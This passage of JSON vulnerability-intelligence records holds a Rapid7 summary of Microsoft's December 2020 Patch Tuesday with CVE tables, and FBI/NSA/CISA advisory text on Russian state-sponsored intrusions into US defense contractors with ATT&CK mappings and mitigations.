"CVE-2020-1472"], "modified": "2020-10-09T19:41:47", "id": "RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856", "href": "https://blog.rapid7.com/2020/10/09/metasploit-wrap-up-82/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-12T10:47:13", "description": "\n\nWe close off our 2020 year of Patch Tuesdays with 58 vulnerabilities being addressed. While it's a higher count than our typical December months (high thirties), it's still a nice breath of fresh air given how the past year has been. We do, however, get to celebrate that none of the reported vulnerabilities covered this month has been publicly exploited nor previously publicly disclosed and only 9 of the 58 vulnerabilities have been marked as Critical by Microsoft.\n\nIn terms of actionables, standard procedures can be followed here in terms of how to prioritize which sets of patches to apply first with two exceptions.\n\n## Microsoft Office vulnerabilities\n\nA fair amount of remote code executions targeting Microsoft Excel are being patched up today and while none of them have the Preview Pane set as an attack vector, the volume of remote code execution vulnerabilities pertaining to Microsoft Office this month may suggest a slight re-jig of priorities. That's our first (minor) exception.\n\nThe next exception is likely the most notable piece behind this December 2020 Patch Tuesday: Microsoft Exchange Server.\n\n## Microsoft Exchange Server vulnerabilities\n\nWhile there are a total of six vulnerabilities from Microsoft Exchange Server this month, two of them garner a CVSS score of 9.1 ([CVE-2020-17132](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>), [CVE-2020-17142](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17142>)) and one is noted by Microsoft has having a higher chance of exploitability ([CVE-2020-17144](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17144>)). These three warrant an additional examination and may be grounds for prioritizing patching.\n\nThere is currently suspicion that [CVE-2020-17132](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>) helps address the patch bypass of [CVE-2020-16875](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-16875>) (CVSS 8.4) from September 2020. As well, both [CVE-2020-17132](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17132>) and [CVE-2020-17142](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17142>) are remote code execution vulnerabilities occurring due to improper validation of cmdlet arguments that affect all supported (as of writing) versions of Microsoft Exchange. One important note to consider is while these vulnerabilities have received a CVSS score of 9.1 and do not require additional user interaction, an attacker must be in an authenticated role in order to exploit this vulnerability.\n\nIn contrast, [CVE-2020-17144](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17144>) which is another remote code execution vulnerability also stemming from improper validation for cmdlet arguments, this one only affects Exchange Server 2010 SP3 and does require additional user interaction to successfully execute. This is extra interesting as [Microsoft Exchange Server 2010 passed end of life back on October 22, 2020](<https://techcommunity.microsoft.com/t5/exchange-team-blog/microsoft-extending-end-of-support-for-exchange-server-2010-to/ba-p/753591>). The introduction of this post-EOL patch for Microsoft Exchange Server 2010 coupled with Microsoft noting this vulnerability to be more likely exploitable does suggest prioritizing this patch a bit earlier.\n\n## New Summary Tables\n\nIn an attempt to provide a bit more summarizing tables, here are this month's patched vulnerabilities split by the product family.\n\n### Azure Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17160](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17160>) | Azure Sphere Security Feature Bypass Vulnerability | False | False | 7.4 | True \n[CVE-2020-16971](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16971>) | Azure SDK for Java Security Feature Bypass Vulnerability | False | False | 7.4 | False \n \n### Browser Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17153](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17153>) | Microsoft Edge for Android Spoofing Vulnerability | False | False | 4.3 | True \n[CVE-2020-17131](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17131>) | Chakra Scripting Engine Memory Corruption Vulnerability | False | False | 4.2 | False \n \n### Developer Tools Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17148](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17148>) | Visual Studio Code Remote Development Extension Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17150](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17150>) | Visual Studio Code Remote Code Execution Vulnerability | False | False | 7.8 | False \n[CVE-2020-17156](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17156>) | Visual Studio Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17159](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17159>) | Visual Studio Code Java Extension Pack Remote Code Execution Vulnerability | False | False | 7.8 | False \n[CVE-2020-17002](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17002>) | Azure SDK for C Security Feature Bypass Vulnerability | False | False | 7.4 | False \n[CVE-2020-17135](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17135>) | Azure DevOps Server Spoofing Vulnerability | False | False | 6.4 | False \n[CVE-2020-17145](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17145>) | Azure DevOps Server and Team Foundation Services Spoofing Vulnerability | False | False | 5.4 | False \n \n### ESU Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17140](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17140>) | Windows SMB Information Disclosure Vulnerability | False | False | 8.1 | True \n[CVE-2020-16958](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16958>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16959](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16959>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16960](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16960>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16961](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16961>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16962](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16962>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16963](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16963>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-16964](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16964>) | Windows Backup Engine Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17098](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17098>) | Windows GDI+ Information Disclosure Vulnerability | False | False | 5.5 | True \n \n### Exchange Server Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17132](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17132>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 9.1 | True \n[CVE-2020-17142](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17142>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 9.1 | True \n[CVE-2020-17143](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17143>) | Microsoft Exchange Information Disclosure Vulnerability | False | False | 8.8 | True \n[CVE-2020-17141](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17141>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 8.4 | True \n[CVE-2020-17144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17144>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 8.4 | True \n[CVE-2020-17117](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17117>) | Microsoft Exchange Remote Code Execution Vulnerability | False | False | 6.6 | False \n \n### Microsoft Dynamics Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17152](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17152>) | Microsoft Dynamics 365 for Finance and Operations (on-premises) Remote Code Execution Vulnerability | False | False | 8.8 | True \n[CVE-2020-17158](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17158>) | Microsoft Dynamics 365 for Finance and Operations (on-premises) Remote Code Execution Vulnerability | False | False | 8.8 | True \n[CVE-2020-17147](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17147>) | Dynamics CRM Webclient Cross-site Scripting Vulnerability | False | False | 8.7 | True \n[CVE-2020-17133](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17133>) | Microsoft Dynamics Business Central/NAV Information Disclosure | False | False | 6.5 | True \n \n### Microsoft Office Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17121](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17121>) | Microsoft SharePoint Remote Code Execution Vulnerability | False | False | 8.8 | True \n[CVE-2020-17118](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17118>) | Microsoft SharePoint Remote Code Execution Vulnerability | False | False | 8.1 | False \n[CVE-2020-17115](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17115>) | Microsoft SharePoint Spoofing Vulnerability | False | False | 8 | True \n[CVE-2020-17122](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17122>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17123](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17123>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17124](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17124>) | Microsoft PowerPoint Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17125](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17125>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17127](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17127>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17128](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17128>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17129](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17129>) | Microsoft Excel Remote Code Execution Vulnerability | False | False | 7.8 | True \n[CVE-2020-17089](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17089>) | Microsoft SharePoint Elevation of Privilege Vulnerability | False | False | 7.1 | False \n[CVE-2020-17119](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17119>) | Microsoft Outlook Information Disclosure Vulnerability | False | False | 6.5 | True \n[CVE-2020-17130](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17130>) | Microsoft Excel Security Feature Bypass Vulnerability | False | False | 6.5 | True \n[CVE-2020-17126](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17126>) | Microsoft Excel Information Disclosure Vulnerability | False | False | 5.5 | True \n[CVE-2020-17120](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17120>) | Microsoft SharePoint Information Disclosure Vulnerability | False | False | 5.3 | True \n \n### Windows Vulnerabilities\n\nCVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | has_faq \n---|---|---|---|---|--- \n[CVE-2020-17095](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17095>) | Hyper-V Remote Code Execution Vulnerability | False | False | 8.5 | True \n[CVE-2020-17092](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17092>) | Windows Network Connections Service Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17134](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17134>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17136](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17136>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17137](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17137>) | DirectX Graphics Kernel Elevation of Privilege Vulnerability | False | False | 7.8 | False \n[CVE-2020-17139](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17139>) | Windows Overlay Filter Security Feature Bypass Vulnerability | False | False | 7.8 | False \n[CVE-2020-17096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17096>) | Windows NTFS Remote Code Execution Vulnerability | False | False | 7.5 | True \n[CVE-2020-17103](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17103>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | False | False | 7 | False \n[CVE-2020-17099](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17099>) | Windows Lock Screen Security Feature Bypass Vulnerability | False | False | 6.8 | True \n[CVE-2020-16996](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16996>) | Kerberos Security Feature Bypass Vulnerability | False | False | 6.5 | True \n[CVE-2020-17094](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17094>) | Windows Error Reporting Information Disclosure Vulnerability | False | False | 5.5 | True \n[CVE-2020-17138](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17138>) | Windows Error Reporting Information Disclosure Vulnerability | False | False | 5.5 | True \n[CVE-2020-17097](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17097>) | Windows Digital Media Receiver Elevation of Privilege Vulnerability | False | False | 3.3 | False \n \n## Summary Graphs\n\n", "cvss3": {}, "published": "2020-12-08T21:36:27", "type": "rapid7blog", "title": "Patch Tuesday - December 2020", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-16875", "CVE-2020-16958", "CVE-2020-16959", "CVE-2020-16960", "CVE-2020-16961", "CVE-2020-16962", "CVE-2020-16963", "CVE-2020-16964", "CVE-2020-16971", "CVE-2020-16996", "CVE-2020-17002", "CVE-2020-17089", "CVE-2020-17092", "CVE-2020-17094", "CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17097", "CVE-2020-17098", "CVE-2020-17099", "CVE-2020-17103", "CVE-2020-17115", "CVE-2020-17117", "CVE-2020-17118", "CVE-2020-17119", "CVE-2020-17120", "CVE-2020-17121", "CVE-2020-17122", "CVE-2020-17123", "CVE-2020-17124", "CVE-2020-17125", "CVE-2020-17126", "CVE-2020-17127", "CVE-2020-17128", "CVE-2020-17129", "CVE-2020-17130", "CVE-2020-17131", "CVE-2020-17132", "CVE-2020-17133", "CVE-2020-17134", "CVE-2020-17135", "CVE-2020-17136", "CVE-2020-17137", "CVE-2020-17138", "CVE-2020-17139", "CVE-2020-17140", "CVE-2020-17141", "CVE-2020-17142", "CVE-2020-17143", "CVE-2020-17144", "CVE-2020-17145", "CVE-2020-17147", "CVE-2020-17148", "CVE-2020-17150", "CVE-2020-17152", "CVE-2020-17153", "CVE-2020-17156", "CVE-2020-17158", "CVE-2020-17159", "CVE-2020-17160"], "modified": "2020-12-08T21:36:27", "id": "RAPID7BLOG:99D9180FBF3F900ADB0CDC5EF79EC080", "href": "https://blog.rapid7.com/2020/12/08/patch-tuesday-december-2020/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "hivepro": [{"lastseen": "2022-02-18T13:30:09", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here In a joint cybersecurity advisory, the Federal Bureau of Investigation (FBI), the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA) revealed that Russian state-sponsored threat actors targeted U.S. defense contractors from January 2020 to February 2022. The threat actors exfiltrated sensitive data from small and large companies in the U.S. working on defense and intelligence contracts, including missile development, vehicle &amp; aircraft and software development. Threat actors gain initial access by using brute force to identify valid account credentials for domain and M365 accounts. Using compromised M365 credentials, including global admin accounts, the threat actors can gain access to M365 resources such as SharePoint pages user-profiles and user emails. They further used harvested credentials in conjunction with known vulnerabilities CVE-2020-0688 &amp; CVE-2020-17144 in the Microsoft exchange server to escalate privileges and gain remote code execution (RCE) on the exposed applications. In addition, they have exploited CVE-2018-13379 on FortiClient to obtain credentials to access networks. After gaining access to networks, the threat actors map the Active Directory (AD) and connect to domain controllers, from which they exfiltrated credentials and export copies of the AD database &quot;ntds.dit&quot;. In multiple breaches, they maintained persistence for at least 6 months in the network continuously exfiltrating sensitive emails and data. Organizations can mitigate the risk by following the recommendations: \u2022Monitor the use of stolen credentials. \u2022Keep all operating systems and software up to date. \u2022Enable multifactor authentication (MFA) for all users, without exception. \u2022 The Techniques commonly used by Russian cyber actor, APT28 are: TA0043: Reconnaissance TA0001: Initial Access TA0004: Privilege Escalation TA0005: Defense Evasion TA0006: Credential Access TA0007: Discovery TA0009: Collection TA0003: Persistence TA0008: Lateral Movement TA0011: Command and Control T1027: Obfuscated Files or Information T1133: External Remote Services T1190: Exploit Public-Facing Application T1083: File and Directory Discovery T1482: Domain Trust Discovery T1213.002: Data from Information Repositories: SharePoint T1090.003: Proxy: Multi-hop Proxy T1589.001: Gather Victim Identity Information: Credentials T1003.003: OS Credential Dumping: NTDS T1110.003: Brute Force: Password Spraying T1566.002: Phishing: Spearphishing Link T1078.002: Valid Accounts: Domain Accounts T1078.004: Valid Accounts: Cloud Accounts Actor Details Vulnerability Details References https://www.cisa.gov/uscert/ncas/alerts/aa22-047a", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-18T12:20:35", "type": "hivepro", "title": "Russian state-sponsored cyber actors targeting U.S. critical infrastructure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2020-0688", "CVE-2020-17144"], "modified": "2022-02-18T12:20:35", "id": "HIVEPRO:FD730BCAD086DD8C995242D13B38EBC8", "href": "https://www.hivepro.com/russian-state-sponsored-cyber-actors-targeting-u-s-critical-infrastructure/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "ics": [{"lastseen": "2023-03-14T18:28:23", "description": "### Summary\n\n_Actions to Help Protect Against Russian State-Sponsored Malicious Cyber Activity:_ \n\u2022 Enforce multifactor authentication. \n\u2022 Enforce strong, unique passwords. \n\u2022 Enable M365** **Unified Audit Logs. \n\u2022 Implement** **endpoint detection and response tools.\n\nFrom at least January 2020, through February 2022, the Federal Bureau of Investigation (FBI), National Security Agency (NSA), and Cybersecurity and Infrastructure Security Agency (CISA) have observed regular targeting of U.S. cleared defense contractors (CDCs) by Russian state-sponsored cyber actors. The actors have targeted both large and small CDCs and subcontractors with varying levels of cybersecurity protocols and resources. These CDCs support contracts for the U.S. Department of Defense (DoD) and Intelligence Community in the following areas:\n\n * Command, control, communications, and combat systems;\n * Intelligence, surveillance, reconnaissance, and targeting;\n * Weapons and missile development;\n * Vehicle and aircraft design; and\n * Software development, data analytics, computers, and logistics. \n\nHistorically, Russian state-sponsored cyber actors have used common but effective tactics to gain access to target networks, including spearphishing, credential harvesting, brute force/password spray techniques, and known vulnerability exploitation against accounts and networks with weak security. These actors take advantage of simple passwords, unpatched systems, and unsuspecting employees to gain initial access before moving laterally through the network to establish persistence and exfiltrate data. \n\nIn many attempted compromises, these actors have employed similar tactics to gain access to enterprise and cloud networks, prioritizing their efforts against the widely used Microsoft 365 (M365) environment. The actors often maintain persistence by using legitimate credentials and a variety of malware when exfiltrating emails and data.\n\nThese continued intrusions have enabled the actors to acquire sensitive, unclassified information, as well as CDC-proprietary and export-controlled technology. The acquired information provides significant insight into U.S. weapons platforms development and deployment timelines, vehicle specifications, and plans for communications infrastructure and information technology. By acquiring proprietary internal documents and email communications, adversaries may be able to adjust their own military plans and priorities, hasten technological development efforts, inform foreign policymakers of U.S. intentions, and target potential sources for recruitment. Given the sensitivity of information widely available on unclassified CDC networks, the FBI, NSA, and CISA anticipate that Russian state-sponsored cyber actors will continue to target CDCs for U.S. defense information in the near future. These agencies encourage all CDCs to apply the recommended mitigations in this advisory, regardless of evidence of compromise.\n\nFor additional information on Russian state-sponsored cyber activity, see CISA's webpage, [Russia Cyber Threat Overview and Advisories](<https://www.us-cert.cisa.gov/russia>).\n\nClick here for a PDF version of this report.\n\n### Threat Details\n\n#### **Targeted Industries and Assessed Motive**\n\nRussian state-sponsored cyber actors have targeted U.S. CDCs from at least January 2020, through February 2022. The actors leverage access to CDC networks to obtain sensitive data about U.S. defense and intelligence programs and capabilities. Compromised entities have included CDCs supporting the U.S. Army, U.S. Air Force, U.S. Navy, U.S. Space Force, and DoD and Intelligence programs.\n\nDuring this two-year period, these actors have maintained persistent access to multiple CDC networks, in some cases for at least six months. In instances when the actors have successfully obtained access, the FBI, NSA, and CISA have noted regular and recurring exfiltration of emails and data. For example, during a compromise in 2021, threat actors exfiltrated hundreds of documents related to the company\u2019s products, relationships with other countries, and internal personnel and legal matters.\n\nThrough these intrusions, the threat actors have acquired unclassified CDC-proprietary and export-controlled information. This theft has granted the actors significant insight into U.S. weapons platforms development and deployment timelines, plans for communications infrastructure, and specific technologies employed by the U.S. government and military. Although many contract awards and descriptions are publicly accessible, program developments and internal company communications remain sensitive. Unclassified emails among employees or with government customers often contain proprietary details about technological and scientific research, in addition to program updates and funding statuses. See figures 1 and 2 for information on targeted customers, industries, and information.\n\n\n\n_Figure 1. Targeted Industries_\n\n\n\n_Figure 2. Exfiltrated Information_\n\n#### \n\n#### **Threat Actor Activity**\n\n_**Note:** This advisory uses the MITRE ATT&amp;CK\u00ae for Enterprise framework, version 10. See the [ATT&amp;CK for Enterprise](<https://attack.mitre.org/versions/v10/techniques/enterprise/>) for all referenced threat actor tactics and techniques. See the Tactics, Techniques, and Procedures (TTPs) section for a table of the threat actors\u2019 activity mapped to MITRE ATT&amp;CK tactics and techniques._\n\n##### _**Initial Access **_\n\nRussian state-sponsored cyber actors use brute force methods, spearphishing, harvested credentials, and known vulnerabilities to gain initial access to CDC networks.\n\n * Threat actors use brute force techniques [[T1110](<https://attack.mitre.org/versions/v10/techniques/T1110>)] to identify valid account credentials [[T1589.001](<https://attack.mitre.org/versions/v10/techniques/T1589/001/>)] for domain and M365 accounts. After obtaining domain credentials, the actors use them to gain initial access to the networks. _**Note:** For more information, see joint NSA-FBI-CISA Cybersecurity Advisory: [Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)._\n * Threat actors send spearphishing emails with links to malicious domains [[T1566.002](<https://attack.mitre.org/versions/v10/techniques/T1566/002>)] and use publicly available URL shortening services to mask the link [[T1027](<https://attack.mitre.org/versions/v10/techniques/T1027>)]. Embedding shortened URLs instead of actor-controlled malicious domains is an obfuscation technique meant to bypass virus and spam scanning tools. The technique often promotes a false legitimacy to the email recipient, increasing the probability of a victim\u2019s clicking on the link. \n * The threat actors use harvested credentials in conjunction with known vulnerabilities\u2014for example, CVE-2020-0688 and CVE-2020-17144\u2014on public-facing applications [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>), [T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)], such as virtual private networks (VPNs), to escalate privileges and gain remote code execution (RCE) on the exposed applications.[[1](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)] In addition, threat actors have exploited CVE-2018-13379 on FortiClient to obtain credentials to access networks. \n * As CDCs find and patch known vulnerabilities on their networks, the actors alter their tradecraft to seek new means of access. This activity necessitates CDCs maintain constant vigilance for software vulnerabilities and out-of-date security configurations, especially in internet-facing systems.\n\n##### _**Credential Access** _\n\nAfter gaining access to networks, the threat actors map the Active Directory (AD) and connect to domain controllers, from which they exfiltrate credentials and export copies of the AD database `ntds.dit` [[T1003.003](<https://attack.mitre.org/versions/v10/techniques/T1003/003/>)]. In multiple instances, the threat actors have used Mimikatz to dump admin credentials from the domain controllers. \n\n##### _**Collection**_\n\nUsing compromised M365 credentials, including global admin accounts, the threat actors can gain access to M365 resources, including SharePoint pages [[T1213.002](<https://attack.mitre.org/versions/v10/techniques/T1213/002/>)], user profiles, and user emails [[T1114.002](<https://attack.mitre.org/versions/v10/techniques/T1114/002/>)].\n\n##### _**Command and Control**_\n\nThe threat actors routinely use virtual private servers (VPSs) as an encrypted proxy. The actors use VPSs, as well as small office and home office (SOHO) devices, as operational nodes to evade detection [[T1090.003](<https://attack.mitre.org/versions/v10/techniques/T1090/003/>)].\n\n##### _**Persistence**_\n\nIn multiple instances, the threat actors maintained persistent access for at least six months. Although the actors have used a variety of malware to maintain persistence, the FBI, NSA, and CISA have also observed intrusions that did not rely on malware or other persistence mechanisms. In these cases, it is likely the threat actors relied on possession of legitimate credentials for persistence [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)], enabling them to pivot to other accounts, as needed, to maintain access to the compromised environments.\n\n#### **Tactics, Techniques, and Procedures**\n\nThe following table maps observed Russian state-sponsored cyber activity to the MITRE ATT&amp;CK for Enterprise framework. Several of the techniques listed in the table are based on observed procedures in contextual order. Therefore, some of the tactics and techniques listed in their respective columns appear more than once. See Appendix A for a functional breakdown of TTPs. _**Note:** for specific countermeasures related to each ATT&amp;CK technique, see the [Enterprise Mitigations](<https://attack.mitre.org/mitigations/>) section and [MITRE D3FEND](<https://d3fend.mitre.org/>)_\u2122. \n\n\n_Table 1: Observed Tactics, Techniques, and Procedures (TTPs)_\n\nTactic | Technique | Procedure \n---|---|--- \n \n**Reconnaissance [[TA0043](<https://attack.mitre.org/versions/v10/tactics/TA0043/>)]**\n\n**Credential Access [[TA0006](<https://attack.mitre.org/versions/v10/tactics/TA0006/>)]**\n\n| \n\nGather Victim Identity Information: Credentials [[T1589.001](<https://attack.mitre.org/versions/v10/techniques/T1589/001/>)] \n\nBrute Force [[T1110](<https://attack.mitre.org/versions/v10/techniques/T1110/003/>)]\n\n| Threat actors used brute force to identify valid account credentials for domain and M365 accounts. After obtaining domain credentials, the actors used them to gain initial access. \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]** | External Remote Services [[T1133](<https://attack.mitre.org/versions/v10/techniques/T1133>)] | Threat actors continue to research vulnerabilities in Fortinet\u2019s FortiGate VPN devices, conducting brute force attacks and leveraging CVE-2018-13379 to gain credentials to access victim networks. [[2](<https://media.defense.gov/2019/Oct/07/2002191601/-1/-1/0/CSA-MITIGATING-RECENT-VPN-VULNERABILITIES.PDF>)] \n \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**\n\n**Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v10/tactics/TA0004>)]**\n\n| \n\nValid Accounts [[T1078](<https://attack.mitre.org/versions/v10/techniques/T1078/>)]\n\nExploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v10/techniques/T1190/>)]\n\n| Threat actors used credentials in conjunction with known vulnerabilities on public-facing applications, such as virtual private networks (VPNs)\u2014CVE-2020-0688 and CVE-2020-17144\u2014to escalate privileges and gain remote code execution (RCE) on the exposed applications. [[3](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/1/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>)] \n \n**Initial Access [[TA0001](<https://attack.mitre.org/versions/v10/tactics/TA0001/>)]**\n\n**Defense Evasion 